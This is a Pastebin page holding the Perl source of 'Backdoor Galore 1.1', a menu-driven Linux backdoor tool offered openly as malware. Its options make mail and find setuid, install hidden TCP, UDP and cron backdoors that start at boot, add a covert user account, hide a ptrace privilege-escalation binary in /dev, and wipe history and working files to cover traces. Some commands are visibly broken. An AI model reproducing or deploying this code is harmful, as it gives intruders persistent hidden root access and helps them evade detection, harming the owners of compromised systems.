FlyFar

Backdoor.Linux.Galore.11 - Source Code

May 15th, 2024
59
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 5.44 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl
  2. # BackDoor Galore 1.1 (fixed!)
  3. # Author: NTFX <ntfx@legion2000.tk>
  4. # Legion2000 Security Research 1995 -
  5. # This is a simple perl script which backdoors a system for you.
  6. # Updated, set wrong rc.local patch and didnt execute them, blah!
  7. # thats what happens when you code at 4am.
  8. ###################################
  9. &option();
  10. sub option() {
  11.     system("clear");
  12. print "##################################\n";
  13. print "#Backdoor Galore By NTFX         #\n";
  14. print "#Contact: <ntfx\@legion2000.tk>   #\n";
  15. print "#Legion2000 Security Research (c)#\n";
  16. print "##################################\n";
  17. print "#[ 1] Do this first of all.      #\n"; # must do this cause im lazy.
  18. print "#[ 2] Create setuid binary's.    #\n"; # /usr/bin/mail & /usr/bin/find.
  19. print "#[ 3] Open up TCP backdoor.      #\n"; # 12350 # hid /usr/sbin/.telnetd.
  20. print "#[ 4] Open up UDP backdoor.      #\n"; # 65535 # hid /usr/sbin/.telnetd.
  21. print "#[ 5] Add Cron Sched'd backdoor. #\n"; # 10001 # only open 3 hours a day.
  22. print "#[ 6] Add unsuspicious user.     #\n"; # gpm or news prob best.
  23. print "#[ 7] Hide ptrace Exploit.       #\n"; # /dev/.pts.
  24. print "#[ 8] Removes Traces             #\n";
  25. print "#[ 9] Social Calls.              #\n"; # Sociable Greetings.
  26. print "#[10] Exit the backdoor Script.  #\n"; # quit the backdoor.
  27. print "##################################\n";
  28. print "#Enter Option:";
  29. chomp($number=<STDIN>);
  30.     if($number == "1") { &di() }
  31.     if($number == "2") { &uid() }
  32.     if($number == "3") { &tcp() }
  33.     if($number == "4") { &udp() }
  34.     if($number == "5") { &cro() }
  35.     if($number == "6") { &usr() }
  36.     if($number == "7") { &ptr() }
  37.     if($number == "8") { &rem() }
  38.     if($number == "9") { &soc() }
  39.     if($number == "10") { &ex() }
  40.     else { &option() } }
  41. ##################
  42. sub di() {
  43.     system ("clear");
  44.     system ("cd $HOME; mkdir ntfx script; mv *.c $HOME/ntfx; mv *pl $HOME/script");
  45. sleep 2;  }
  46. ##################
  47. sub uid()  {
  48.     system ("clear");
  49. print "we will now make a setuid file in /usr/bin";
  50.     system ("cd /usr/bin; chmod +s mail; cd $HOME");
  51. print "mail is now +s\n"; #edit as you wish.
  52.     system ("cd /usr/bin; chmod +s find; cd $HOME");
  53. print "find is now +s\n"; #edit as you wish.
  54. sleep 1;  }
  55. ##################
  56. sub tcp() {
  57.     system ("clear");
  58. print "We are now going to create a basic tcp backdoor\n";
  59.     system ("cd ../ntfx; gcc tcp.c -o tcp; mv /usr/sbin/.telnetd; echo
  60.                /usr/sbin/.telnetd >> /etc/rc.d/rc.local; /usr/sbin/.telnetd &"); # starts on boot.
  61. print "tcp backdoor is now running on specified port and enabled at boot\n";
  62. sleep 1;  }
  63. ###################
  64. sub udp() {
  65.     system ("clear");
  66. print "We are now going to install a basic udp backdoor\n";
  67.     system ("cd ../ntfx; gcc udp.c -o udp; mv /usr/sbin/.telnetd.; echo
  68.         /usr/sbin/.telnetd. >> /etc/rc.d/rc.local; /usr/sbin/.telnetd. &");
  69. print "udp backdoor now running on specified port and enabled at boot\n";
  70. sleep 1;  }
  71. ###################
  72. sub cro() {
  73.     system ("clear");
  74. print "We are now going to install a backdoor into the crond\n";
  75.     system ("bash crond.sh");
  76. print "The cron backdoor is now installed, and running on the specified port\n";
  77. sleep 1; }
  78. ###################
  79. sub usr() {
  80.     system ("clear");
  81. print "we will now add a unsuspicious user to the system\n";
  82. print "username: ";
  83. chomp($user=<STDIN>); # be sensible, an acc called "hax0r" will be noticed.
  84. print "UID: ";
  85. chomp($uid=<STDIN>);
  86. print "GID: ";
  87. chomp($gid=<STDIN>);
  88. print "home dir: ";
  89. chomp($home=<STDIN>); #/home/httpd maybe?
  90. print "type of shell: ";
  91. chomp($sh=<STDIN>);
  92. print "comments: "; # preferably leave blank
  93. chomp($cm=<STDIN>);
  94.     system("/usr/sbin/useradd $user -u $uid -g $gid -d $home -s $sh -c $cm");
  95.     system("passwd $user");
  96. sleep 1;  }
  97. ##################
  98. sub ptr() {
  99.     system ("clear");
  100. print "we are now going to compile and hide the ptrace exploit\n";
  101. print "name the user you previously entered";
  102. chomp ($usr=<STDIN>);
  103.     system ("cd ../ntfx; gcc ptrace.c -o pts; chown $usr pts; mv pts /dev/.pts");
  104. print "ptrace is now stored in /dev/.pts";
  105. sleep 1;  }
  106. ##################
  107. sub soc()  {
  108.     system ("clear");
  109. print "Greetings:\n";
  110. sleep 1;
  111. print "opt1k, SpyModem, eckis, EazyMoney, Phantasm, Epheo, I-L, wired-\n";
  112. sleep 1;
  113. print "BlackSun Research, Legion2000 Crew, efnet #feed-the-goats\n";
  114. $sex;
  115. print "press any key to continue....";
  116. chomp($sex=<STDIN>); }
  117. ##################
  118. sub rem() {
  119.     system ("clear");
  120. print "we are now going to remove files we have used.\n";
  121.     system ("rm -rf $HOME/scripts; rm -rf $HOME/ntfx");
  122. print "now removing history files.\n";
  123.     system ("HISTFILE=/dev/null; HISTFILESIZE=0; rm -rf .*"); }
  124. # had to redo due to paul holden selecting remove traces on the original source.
  125. #############
  126. sub ex() {
  127.     system("clear");
  128. print"    #                                      #####    ###     ###     ###\n";
  129. print"    #       ######  ####  #  ####  #    # #     #  #   #   #   #   #   #\n";
  130. print"    #       #      #    # # #    # ##   #       # #     # #     # #     #\n";
  131. print"    #       #####  #      # #    # # #  #  #####  #     # #     # #     #\n";
  132. print"    #       #      #  ### # #    # #  # # #       #     # #     # #     #\n";
  133. print"    #       #      #    # # #    # #   ## #        #   #   #   #   #   #\n";
  134. print"    ####### ######  ####  #  ####  #    # #######   ###     ###     ###\n";
  135. print"                www.legion2000.tk\n";
  136. print"              efnet #feed-the-goats\n";
  137. print"\n\n";
  138. print"Press Any Key To Exit\n";
  139. $sex;
  140. chomp($sex=<STDIN>);
  141. exit 1;}
Add Comment
Please, Sign In to add comment